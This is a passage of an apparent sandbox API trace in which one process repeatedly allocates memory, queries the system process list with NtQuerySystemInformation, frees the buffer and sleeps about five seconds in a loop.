SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.594] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.605] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.614] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.623] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.634] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.643] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.652] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.660] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.669] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.677] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.685] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.694] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.702] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.711] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.719] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.727] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.739] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.747] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.756] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.764] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.773] 